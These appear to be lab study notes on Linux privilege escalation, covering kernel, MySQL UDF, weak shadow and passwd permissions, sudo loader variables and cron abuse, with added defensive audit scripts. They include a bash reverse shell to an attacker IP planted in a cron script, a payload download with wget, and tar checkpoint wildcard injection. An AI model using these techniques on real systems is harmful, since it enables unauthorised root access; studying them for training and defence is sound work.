Looking at the results, we can see that the host is vulnerable to a popular kernel exploit (Dirty COW).
Run the exploit and execute the /usr/bin/passwd binary.
Service Exploits
What are Services?
Programs that run in the background, accepting input or performing regular tasks.
If vulnerable services are running as root, exploiting them can lead to command execution as root.
Service exploits can be found using Searchsploit, Google and GitHub.
Services Running as Root
The following command shows all processes that are running as root.
ps aux | grep "^root"
As with any enumeration output, try to identify the version number of each program being executed.
Enumerating Program Versions
<program> --version
<program> -v
#DPKG CAN SHOW INSTALLED PROGRAMS AND THEIR VERSION
dpkg -l | grep <program>
#RPM SYSTEMS
rpm -qa | grep <program>
Service Exploit Example
./lse.sh -l 1 -i
MySQL is running as root.
You can connect to MySQL as root without a password!
You can verify with:
ps aux | grep '^root'
This lists the processes running as root; mysqld is among them.
Why is this important?
MySQL has the ability to install user-defined functions that run via shared objects. The following exploit can be used to install a new function that allows us to execute system commands from a MySQL command prompt. Commands will be executed as root because MySQL is running as root.
gcc -g -c raptor_udf2.c -fPIC
Execute commands
Port Forwarding
Sometimes root processes are bound to an internal port, through which they communicate. You can forward the port using the following SSH command:
#Determine which port MySQL is listening on
netstat -nl
#ON OUR TARGET MACHINE
ssh -R 4444:127.0.0.1:3306 kali@10.0.2.4
#ON OUR KALI MACHINE
mysql -u root -h 127.0.0.1 -P 4444
select @@hostname;
Weak File Permissions
If permissions on system files are weak, those files can be taken advantage of to perform privilege escalation.
/etc/shadow contains password hashes and by default is only readable by root.
If we can read this file, we may be able to crack the root user's hash.
If we can modify it, we can replace the root user's hash with a hash we know.
./lin.sh -i | more
[!] sys030 Can we read /etc/shadow file?................................... yes!
---
root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
daemon:*:17298:0:99999:7:::
bin:*:17298:0:99999:7:::
sys:*:17298:0:99999:7:::
sync:*:17298:0:99999:7:::
games:*:17298:0:99999:7:::
man:*:17298:0:99999:7:::
lp:*:17298:0:99999:7:::
mail:*:17298:0:99999:7:::
news:*:17298:0:99999:7:::
uucp:*:17298:0:99999:7:::
proxy:*:17298:0:99999:7:::
www-data:*:17298:0:99999:7:::
backup:*:17298:0:99999:7:::
list:*:17298:0:99999:7:::
irc:*:17298:0:99999:7:::
gnats:*:17298:0:99999:7:::
nobody:*:17298:0:99999:7:::
libuuid:!:17298:0:99999:7:::
Debian-exim:!:17298:0:99999:7:::
sshd:*:17298:0:99999:7:::
user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:17298:0:99999:7:::
statd:*:17299:0:99999:7:::
mysql:!:18133:0:99999:7:::
#The file is both readable and writable
user@debian:~/tools/privesc-scripts$ ls -l /etc/shadow
-rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow
user@debian:~/tools/privesc-scripts$
user@debian:~/tools/privesc-scripts$ head -n 1 /etc/shadow
root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
user@debian:~/tools/privesc-scripts$
This is important: the field between the first two colons holds the hash. In this case it is:
kali@kali:~$ sudo john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password123 (?)
1g 0:00:00:00 DONE (2021-01-04 19:48) 1.515g/s 2327p/s 2327c/s 2327C/s cuties..mexico1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Writing to shadow
Similarly, because we can write to the shadow file, we can replace a hash directly.
/etc/passwd also used to contain password hashes, back in the day.
A hash in /etc/passwd takes precedence over the shadow file.
root@debian:/home/user# ls -l /etc/passwd
-rw-r--rw- 1 root root 1009 Aug 25 2019 /etc/passwd
root@debian:/home/user# openssl passwd "password"
YQyhPgG7w5s3s
root@debian:/home/user# vi /etc/passwd
root@debian:/home/user# exit
exit
user@debian:~$ su
Password:
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:/home/user#
We can also create a new user with root privileges by copying the root line to the bottom of /etc/passwd; as long as the UID is 0, the account is root.
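The following is an added audit example, not part of the original notes: it detects the /etc/passwd conditions used above (an inline hash that overrides the shadow entry, an extra UID-0 account) and the loose permissions on /etc/passwd and /etc/shadow that made them possible. The function names and the sample passwd content are constructed for this example.

```shell
# Added audit example, not from the original notes: detect from the
# defender's side the two /etc/passwd conditions used above, plus the
# loose file permissions that made them possible.

# Print one finding per line for a passwd-format file ($1):
#   - a password field other than x / * / ! holds an inline hash, which
#     takes precedence over the shadow entry
#   - an empty password field means the account needs no password
#   - any UID-0 entry besides root is a second root account
audit_passwd_file() {
    awk -F: '
        $3 == 0 && $1 != "root"                { print "extra uid-0 account: " $1 }
        $2 == ""                               { print "empty password field: " $1 }
        $2 != "" && $2 != "x" && $2 !~ /^[!*]/ { print "inline hash overrides shadow: " $1 }
    ' "$1"
}

# Print a finding when group or other holds the write bit on $1; the
# notes' "-rw-r--rw-" on /etc/shadow and /etc/passwd both trigger it.
check_writable() {
    mode=$(stat -c %a "$1" 2>/dev/null) || return 0
    case "$mode" in *[2367]?) echo "group-writable: $1 (mode $mode)" ;; esac
    case "$mode" in *[2367])  echo "other-writable: $1 (mode $mode)" ;; esac
}

# Constructed sample: a planted UID-0 user carrying the crypt hash the
# notes produced with 'openssl passwd "password"', in a world-writable file.
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
user:x:1000:1000:user:/home/user:/bin/bash
newroot:YQyhPgG7w5s3s:0:0::/root:/bin/bash
EOF
chmod 646 "$SAMPLE"
audit_passwd_file "$SAMPLE"
check_writable "$SAMPLE"
rm -f "$SAMPLE"
```

On a live host, run audit_passwd_file /etc/passwd and check_writable on both /etc/passwd and /etc/shadow; any output is a finding.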
Backups
Even if backups exist, they may be insecure. Check /home, / (root), /tmp and /var/backups.
root@debian:/.ssh# cat root_key
-----BEGIN RSA PRIVATE KEY-----
[key material omitted]
-----END RSA PRIVATE KEY-----
root@debian:/.ssh# gretp PermitRootLogin /etc/ssh/sshd_config
bash: gretp: command not found
root@debian:/.ssh# grep PermitRootLogin /etc/ssh/sshd_config
PermitRootLogin yes
# the setting of "PermitRootLogin without-password".
root@debian:/.ssh#
kali@kali:~$ vi root_key
kali@kali:~$ chmod 600 root_key
kali@kali:~$ ssh -i root_key root@10.0.2.7
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jan 3 14:00:26 2021
root@debian:~# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:~#
Running Sudo
user@debian:~/tools/privesc-scripts$ ./lse.sh -i | more
[!] sud010 Can we list sudo commands without a password?................... yes!
---
Matching Defaults entries for user on this host:
env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
User user may run the following commands on this host:
(root) NOPASSWD: /usr/sbin/iftop
(root) NOPASSWD: /usr/bin/find
(root) NOPASSWD: /usr/bin/nano
(root) NOPASSWD: /usr/bin/vim
(root) NOPASSWD: /usr/bin/man
(root) NOPASSWD: /usr/bin/awk
(root) NOPASSWD: /usr/bin/less
(root) NOPASSWD: /usr/bin/ftp
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/sbin/apache2
(root) NOPASSWD: /bin/more
user@debian:~/tools/privesc-scripts$ sudo -l
Matching Defaults entries for user on this host:
env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
User user may run the following commands on this host:
(root) NOPASSWD: /usr/sbin/iftop
(root) NOPASSWD: /usr/bin/find
(root) NOPASSWD: /usr/bin/nano
(root) NOPASSWD: /usr/bin/vim
(root) NOPASSWD: /usr/bin/man
(root) NOPASSWD: /usr/bin/awk
(root) NOPASSWD: /usr/bin/less
(root) NOPASSWD: /usr/bin/ftp
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/sbin/apache2
(root) NOPASSWD: /bin/more
user@debian:~/tools/privesc-scripts$ sudo apache2 -f /etc/shadow
Syntax error on line 1 of /etc/shadow:
Invalid command 'root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::', perhaps misspelled or defined by a module not included in the server configuration
LD_PRELOAD
user@debian:~/tools/sudo$ sudo -l
Matching Defaults entries for user on this host:
env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
User user may run the following commands on this host:
(root) NOPASSWD: /usr/sbin/iftop
(root) NOPASSWD: /usr/bin/find
(root) NOPASSWD: /usr/bin/nano
(root) NOPASSWD: /usr/bin/vim
(root) NOPASSWD: /usr/bin/man
(root) NOPASSWD: /usr/bin/awk
(root) NOPASSWD: /usr/bin/less
(root) NOPASSWD: /usr/bin/ftp
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/sbin/apache2
(root) NOPASSWD: /bin/more
user@debian:~/tools/sudo$ ls -l
total 8
-rw-r--r-- 1 user user 184 May 15 2020 library_path.c
-rw-r--r-- 1 user user 149 May 15 2020 preload.c
user@debian:~/tools/sudo$ gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c
user@debian:~/tools/sudo$ sudo LD_PRELOAD=/tmp/preload.so find
root@debian:/home/user/tools/sudo# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:/home/user/tools/sudo# whoami
root
LD_LIBRARY_PATH
This environment variable contains a set of directories that are searched first for shared libraries.
The ldd command can be used to print the shared libraries used by a program:
ldd /usr/sbin/apache2
By creating a library with the same name as one used by the program, and setting LD_LIBRARY_PATH to its parent directory, the program will load our shared library instead.
user@debian:~/tools/sudo$ sudo -l
Matching Defaults entries for user on this host:
env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
User user may run the following commands on this host:
(root) NOPASSWD: /usr/sbin/iftop
(root) NOPASSWD: /usr/bin/find
(root) NOPASSWD: /usr/bin/nano
(root) NOPASSWD: /usr/bin/vim
(root) NOPASSWD: /usr/bin/man
(root) NOPASSWD: /usr/bin/awk
(root) NOPASSWD: /usr/bin/less
(root) NOPASSWD: /usr/bin/ftp
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/sbin/apache2
(root) NOPASSWD: /bin/more
user@debian:~/tools/sudo$ ldd /usr/sbin/apache2
linux-vdso.so.1 => (0x00007fff42178000)
libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3 (0x00007fa3a02e8000)
libaprutil-1.so.0 => /usr/lib/libaprutil-1.so.0 (0x00007fa3a00c4000)
libapr-1.so.0 => /usr/lib/libapr-1.so.0 (0x00007fa39fe8a000)
libpthread.so.0 => /lib/libpthread.so.0 (0x00007fa39fc6e000)
libc.so.6 => /lib/libc.so.6 (0x00007fa39f902000)
libuuid.so.1 => /lib/libuuid.so.1 (0x00007fa39f6fd000)
librt.so.1 => /lib/librt.so.1 (0x00007fa39f4f5000)
libcrypt.so.1 => /lib/libcrypt.so.1 (0x00007fa39f2be000)
libdl.so.2 => /lib/libdl.so.2 (0x00007fa39f0b9000)
libexpat.so.1 => /usr/lib/libexpat.so.1 (0x00007fa39ee91000)
/lib64/ld-linux-x86-64.so.2 (0x00007fa3a07a5000)
user@debian:~/tools/sudo$ ls
library_path.c preload.c
user@debian:~/tools/sudo$ gcc -o libcrypt.so.1 -shared -fPIC library_path.c
user@debian:~/tools/sudo$ sudo LD_LIBRARY_PATH=. apache2
apache2: ./libcrypt.so.1: no version information available (required by /usr/lib/libaprutil-1.so.0)
root@debian:/home/user/tools/sudo# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:/home/user/tools/sudo#
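The following is an added example, not part of the original notes, that serves both the LD_PRELOAD and LD_LIBRARY_PATH sections: it lints a 'sudo -l' listing for the combination both rely on, loader variables preserved by env_keep together with commands that run as root. The function names are assumed for this example and the sample listing is copied from the output above.

```shell
# Added example, not from the original notes: lint a 'sudo -l' listing
# (read from stdin) for loader variables kept by env_keep alongside
# NOPASSWD commands that run as root.

# Print each LD_* variable preserved by env_keep, one per line.
kept_loader_vars() {
    grep -o 'env_keep+=LD_[A-Z_]*' | sed 's/^env_keep+=//' | sort -u
}

# Print each NOPASSWD command that runs as root, one per line.
nopasswd_root_cmds() {
    sed -n 's/^[[:space:]]*(root)[[:space:]]*NOPASSWD:[[:space:]]*//p'
}

# Return 1 (and say why) when both are present: sudo then passes
# LD_PRELOAD / LD_LIBRARY_PATH from the caller's environment into a root
# process, so the fix is dropping those env_keep entries from sudoers.
lint_sudo_listing() {
    listing=$(cat)
    vars=$(printf '%s\n' "$listing" | kept_loader_vars)
    cmds=$(printf '%s\n' "$listing" | nopasswd_root_cmds)
    if [ -n "$vars" ] && [ -n "$cmds" ]; then
        echo "FAIL: env_keep preserves $(echo $vars) for $(printf '%s\n' "$cmds" | grep -c .) root NOPASSWD command(s)"
        return 1
    fi
    echo "OK: no loader variable reaches a root command"
    return 0
}

# Constructed sample: the listing shown above, shortened to three commands.
SAMPLE='Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/sbin/apache2'

printf '%s\n' "$SAMPLE" | lint_sudo_listing || echo "lint exit status: $?"
```

On a live host, pipe the real output of sudo -l into lint_sudo_listing; a non-zero exit status is the finding.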
Cron Jobs
Cron jobs are programs or scripts that run at scheduled times or at regular intervals.
Crontabs store the configuration for cron jobs. They are located at:
/var/spool/cron/
/var/spool/cron/crontabs/
System-wide: /etc/crontab
File Permissions
A misconfigured file permission on a cron job's script can lead to an easy root!
./lse.sh -l 1 -i | more
[*] ret020 Cron jobs....................................................... yes!
---
/etc/crontab:SHELL=/bin/sh
/etc/crontab:PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
/etc/crontab:17 * * * * root cd / && run-parts --report /etc/cron.hourly
/etc/crontab:25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
/etc/crontab:47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
/etc/crontab:52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
/etc/crontab:* * * * * root overwrite.sh
/etc/crontab:* * * * * root /usr/local/bin/compress.sh
user@debian:~/tools/privesc-scripts$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh
user@debian:~/tools/privesc-scripts$ locate overwrite.sh
/usr/local/bin/overwrite.sh
user@debian:~/tools/privesc-scripts$ ls -l /usr/local/bin/overwrite.sh
-rwxr--rw- 1 root staff 40 May 13 2017 /usr/local/bin/overwrite.sh
user@debian:~/tools/privesc-scripts$
#REVERSE SHELL VIA THE CRON JOB SCRIPT
user@debian:~/tools/privesc-scripts$ ls -l /usr/local/bin/overwrite.sh
-rwxr--rw- 1 root staff 40 May 13 2017 /usr/local/bin/overwrite.sh
user@debian:~/tools/privesc-scripts$ vi /usr/local/bin/overwrite.sh
user@debian:~/tools/privesc-scripts$ vi /usr/local/bin/overwrite.sh
user@debian:~/tools/privesc-scripts$ cat /usr/local/bin/overwrite.sh
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.0.2.4/1111 0>&1
user@debian:~/tools/privesc-scripts$
Writable Paths Present in Cron Jobs
The crontab PATH environment variable is set to /usr/bin:/bin by default.
The PATH variable can be overridden in the crontab file.
If a cron job does not use an absolute path, and one of the PATH directories is writable by our user, we may be able to create a program or script with the same name as the cron job's command.
./lse.sh -l 1 -i | more
[!] ret060 Can we write to executable paths present in cron jobs........... yes!
---
/etc/crontab:PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
user@debian:~/tools/privesc-scripts$ vim overwrite.sh
user@debian:~/tools/privesc-scripts$ chmod +x overwrite.sh
user@debian:~/tools/privesc-scripts$ watch -n 1 ls -l /tmp
user@debian:~/tools/privesc-scripts$ pwd
/home/user/tools/privesc-scripts
user@debian:~/tools/privesc-scripts$ cp overwrite.sh /home/user/
user@debian:~/tools/privesc-scripts$ watch -n 1 ls -l /tmp
user@debian:~/tools/privesc-scripts$ ls -l /tmp/
total 1044
-rw-r--r-- 1 root root 100740 Jan 4 08:29 backup.tar.gz
-rwxr-xr-x 1 user user 3857 Jan 4 07:36 preload.so
-rwsr-sr-x 1 root root 926536 Jan 4 08:29 rootbash
-rw------- 1 user user 7817 Jan 4 08:04 tmp.5CqN3heSzG
-rw------- 1 user user 11151 Jan 4 08:03 tmp.EVXGVRQj7P
-rw-r--r-- 1 root root 28 Jan 4 08:09 useless
user@debian:~/tools/privesc-scripts$ /tmp/rootbash -p
rootbash-4.1# id
uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
rootbash-4.1# whoami
root
user@debian:~$ cat /usr/local/bin/compress.sh
#!/bin/sh
cd /home/user
tar czf /tmp/backup.tar.gz *
user@debian:~$ wget http://10.0.2.4:80/shell.elf
--2021-01-04 08:39:27-- http://10.0.2.4/shell.elf
Connecting to 10.0.2.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 194 [application/octet-stream]
Saving to: “shell.elf”
100%[=================================================================================================================>] 194 --.-K/s in 0s
2021-01-04 08:39:27 (52.0 MB/s) - “shell.elf” saved [194/194]
user@debian:~$ ls
myvpn.ovpn overwrite.sh shadow_backup shell.elf tools
user@debian:~$ chmod +x shell.elf
user@debian:~$ touch ./--checkpoint=1
user@debian:~$ touch ./--checkpoint-action=exec=shell.elf
user@debian:~$
Attacker machine
kali@kali:~$ nc -lvnp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.0.2.7.
Ncat: Connection from 10.0.2.7:55114.
id
uid=0(root) gid=0(root) groups=0(root)
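The following is an added audit example, not part of the original notes, covering the three cron weaknesses shown above (a script writable by others, a writable PATH directory searched before a relatively named command, and an unquoted tar wildcard). It reads a system-wide crontab in the /etc/crontab format; the function names are assumed for this example.

```shell
# Added audit example, not from the original notes: scan a system-wide
# crontab (five time fields, user, command, as in /etc/crontab) for the
# three weaknesses the notes exploit. Usage: audit_crontab /etc/crontab
# True when group or other holds the write bit on $1 (overwrite.sh above
# was -rwxr--rw-, so any local user could edit what root runs each minute).
writable_by_others() {
    case "$(stat -c %a "$1" 2>/dev/null)" in *[2367]?|*[2367]) return 0 ;; esac
    return 1
}
# Walk PATH string $2 for bare command $1: print every writable directory
# searched before the real file (a local user can plant a same-named file
# there, as the notes did in /home/user), then "=<resolved path>".
resolve_on_path() (
    IFS=:
    for d in $2; do
        [ -e "$d/$1" ] && { printf '=%s\n' "$d/$1"; return 0; }
        [ -w "$d" ] && printf '%s\n' "$d"
    done
    return 0
)
# Print one finding per line for crontab $1.
audit_crontab() (
    set -f                    # keep "* * * * *" from globbing filenames
    [ -r "$1" ] || { echo "cannot read $1" >&2; return 1; }
    path=/usr/bin:/bin        # cron's default until a PATH= line overrides it
    while IFS= read -r line; do
        case "$line" in
            ''|'#'*)       continue ;;
            PATH=*)        path=${line#PATH=}; continue ;;
            [A-Za-z_]*=*)  continue ;;          # SHELL=, MAILTO= and similar
        esac
        set -- $line
        [ $# -ge 7 ] || continue                # @reboot-style lines are skipped
        user=$6 cmd=$7 target=
        case "$cmd" in
            /*) target=$cmd ;;
            *)  for hit in $(resolve_on_path "$cmd" "$path"); do
                    case "$hit" in
                        =*) target=${hit#=} ;;
                        *)  echo "writable dir $hit searched before '$cmd' (user $user)" ;;
                    esac
                done ;;
        esac
        [ -n "$target" ] || continue
        writable_by_others "$target" && echo "script writable by others: $target (user $user)"
        grep -qs 'tar .*\*' "$target" && echo "unquoted tar wildcard in $target (user $user)"
    done < "$1"
    return 0
)
```

Run as the unprivileged user you are assessing, since the writable-directory test uses that user's own permissions.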